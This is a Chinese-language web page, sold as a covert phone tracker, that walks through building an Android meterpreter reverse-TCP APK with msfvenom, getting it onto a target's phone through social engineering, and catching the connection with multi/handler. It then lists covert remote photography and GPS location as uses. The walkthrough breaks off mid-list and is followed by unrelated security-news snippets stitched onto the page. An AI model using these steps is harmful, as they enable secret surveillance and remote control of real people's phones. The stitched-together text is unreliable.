手机定位录音追踪器(放手机里的微型定位器)MsfvenomKali中的metasploit有一个工具,名为msfvenom,可以生成众多版本的有效载荷,也就是可执行远控。比如,我们可以将生成的安卓apk可执行程序经过社工,安装在目标手机中,即可完成长期监听或跟踪。那如何实现呢?这里我们就要用到msf
手机定位录音追踪器(放手机里的微型定位器)
Kali中的metasploit有一个工具,名为msfvenom,可以生成众多版本的有效载荷,也就是可执行远控。
比如,我们可以将生成的安卓apk可执行程序经过社工,安装在目标手机中,即可完成长期监听或跟踪。那如何实现呢?这里我们就要用到msfvenom,接下来我们看看使用的 *** 。
kali终端下输入:
msfvenom -h 查看使用帮助
其中我们要关注的参数是,-p(指定攻击有效载荷)-f(指定生成文件的格式)
msfvenom -l payload *** sfvenom -l formats
生成远控的完整命令:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.111 LPORT=8888 R> test.apk
这里没有使用-f参数,生成安卓可执行程序,可以不用。
部署可执行程序
将生成的安卓远控app安装在目标靶机中,可以通过搭建服务器,让目标下载安装apk。
启动msf
Kali终端下输入:msfconsole
继续输入:
use exploit/multi/handler
本模块专门用于设置独立的连接受理程序,这是我们寻找的最后一块拼图!在这种使用远控载荷的情况下,设置multi/handler是必须的,否则无法进程远程控制。
为该模块设置参数:
show optionsset LHOST 192.168.31.111set lport 8888
这里的设置必须和前面用msfvenom的设置保持一致。
run执行侦听,等待上线
得到meterpreter会话
一旦目标安卓手机(靶机)用户点击了我们生成的test.apk图标,我们的kali就会监听到连接信号,得到一个远程控制目标(靶机)手机的meterpreter会话。
输入"?"即可显示所有远程控制安卓手机的命令,我们这里选择最精彩的三个:
远程拍照:目标手机不会有任何察觉,属于后台系统拍照;
gps定位:直接显示经纬度地理位置,非常精准;
Hackernews 编译,转载请注明出处: Adafruit 披露了一个数据泄露事件,这个事件是由于一个可公开查看的 GitHub 存储库引起的。 该公司怀疑这可能允许攻击者对2019年或之前对某些用户的信息进行“未经授权的访问”。 Adafruit 总部位于纽约市,自2005年以来一直是开源硬...
上周,Chrome Security 团队的 Adrian Taylor,在一篇谷歌安全博客文章中解释了“为何在野外被利用的 CVE 漏洞似乎有所增加”。对于这种漏洞利用的可见性增长趋势,归咎于多个方面的因素。而谷歌旗下的 Project Zero 团队,也有对包括 WebKit、IE、Flash、...
根据区块链数据公司Chainalysis的一份报告,在2021年底,网络犯罪分子拥有超过110亿美元与非法活动有关的加密货币,比2020年底的30亿美元有了飞速的增长。最有利可图的犯罪行为是盗窃。据该公司称,犯罪分子、加密货币钱包中93%的资金是由价值98亿美元的被盗币构成。 为了找到这些数字,Ch...
区块链分析公司 Peck Shield 于周日上午发布警告称,一名攻击者设法从 Beanstalk Farms 中提取了价值约 1.82 亿美元的加密货币。据悉,作为一个旨在平衡不同加密货币资产供需的去中心化金融(DeFi)项目,攻击者利用了 Beanstalk 的“多数投票治理系统”,这也是诸多...
一场在全球范围性欺诈行为被发现,它利用151个恶意Android应用程序,下载量达1050万次,在未经用户同意和知情的情况下将用户拉入付费订阅服务。 名为“Ultimams”的付费短信诈骗活动据信于2021年5月开始,涉及的应用程序涵盖范围广泛,包括输入法、二维码扫描仪、视频和照片编辑器、垃圾邮件拦...
根据 NK News 获得的日志文件和域名记录显示,在上周五和上周日朝鲜的关键服务器无法访问,从而在互联网上消失了数个小时。网络安全研究员 Junade Ali 说,连接失败的模式表明,朝鲜的 IT 基础设施可能受到了分布式拒绝服务(DDOS)攻击。 图片来自于 Pixabay Ali 表示:“断...